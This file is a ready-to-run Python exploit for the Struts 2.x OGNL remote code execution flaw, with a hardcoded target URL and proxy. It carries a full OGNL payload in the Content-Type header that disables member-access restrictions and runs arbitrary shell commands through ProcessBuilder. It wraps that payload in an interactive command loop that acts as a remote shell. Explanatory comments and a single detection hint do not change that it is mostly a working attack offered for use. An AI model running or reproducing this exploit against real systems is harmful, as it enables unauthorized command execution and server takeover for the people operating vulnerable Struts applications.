A script to exploit Struts 2.x RCE
'''
Script that exercises the Struts 2.x RCE by sending an OGNL expression in the
Content-Type request header of a GET to a Struts action (see getHeader).

The following versions of Struts are affected:
Struts 2.3.5
Struts 2.3.31
Struts 2.5
Struts 2.5.10
'''
import requests | |
#################### EDIT BELOW #########################
# Proxy map passed to requests as ``proxies=`` for the command requests only;
# the reachability probe further down is sent without it.
proxy = {"http": "http://200.123.182.25:8081"} # You can add burp, any other proxy or even go without proxy.
# Target action URL; every request in this script is a GET to this address.
url = "http://ptl-b25057ac-0d58bb5e.libcurl.so/example/HelloWorld.action"
#################### EDIT ABOVE #########################
# NOTE: "\/" is not a valid Python escape sequence; newer interpreters emit a
# SyntaxWarning here. The literal is left as the author wrote it.
print("/\/\/\/\/ Starting /\/\/\/\/\n")
def getHeader(command):
    """Return the request headers carrying the OGNL expression for ``command``.

    The expression lives in the ``Content-Type`` header. As written, it first
    disables OGNL's member-access restrictions (it clears the excluded package
    and excluded class lists and installs DEFAULT_MEMBER_ACCESS), then starts
    ``command`` via ``java.lang.ProcessBuilder`` (``cmd.exe /c`` on Windows,
    ``/bin/bash -c`` otherwise) with stderr merged into stdout, and copies the
    process output into the servlet response stream. That is why the caller
    prints the HTTP body as the command output.

    Detection note: ``%{`` can never begin a valid media type, so a
    Content-Type request header starting with ``%{`` is a reliable indicator
    of this payload class and is worth alerting on at the proxy or WAF.

    Args:
        command: Shell command string spliced into the expression verbatim.

    Returns:
        dict with the single ``Content-Type`` entry, ready for ``headers=``.
    """
    # Generate Payload Header
    payload = {"Content-Type": "%{(#n='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"}
    return payload
# Is the URL working, hmmm ?
# Reachability probe. It is sent without ``proxy`` and treats any 4xx/5xx as
# "unreachable"; a 3xx or 2xx passes.
res = requests.get(url)
# NOTE: ``exit()`` is the ``site``-module helper, not ``sys.exit``; it is absent
# when Python runs with ``-S``.
if(res.status_code >= 400): print("[-] URL Not Reachable !"); exit()
print("[+] URL seems to be working fine :)")
print("[+] Setting up command interface.\n")
# Interactive loop: each non-empty line is sent once as its own request;
# the literal "exit" ends the session.
while 1:
    command = input("/\/\ Command => ")
    if(command == "exit"): print("[+] Happy Hacking :)\n"); break
    # Printed before the empty-input check, so a blank line still reports "Sending".
    print("[+] Sending Payload.\n")
    if(len(command) < 1): continue
    # The response body is whatever the OGNL expression copied into the
    # servlet response, i.e. the command output.
    res = requests.get(url, headers=getHeader(command), proxies=proxy)
    # Strict decode: raises UnicodeDecodeError if the output is not valid UTF-8.
    print(res.content.decode("utf-8"))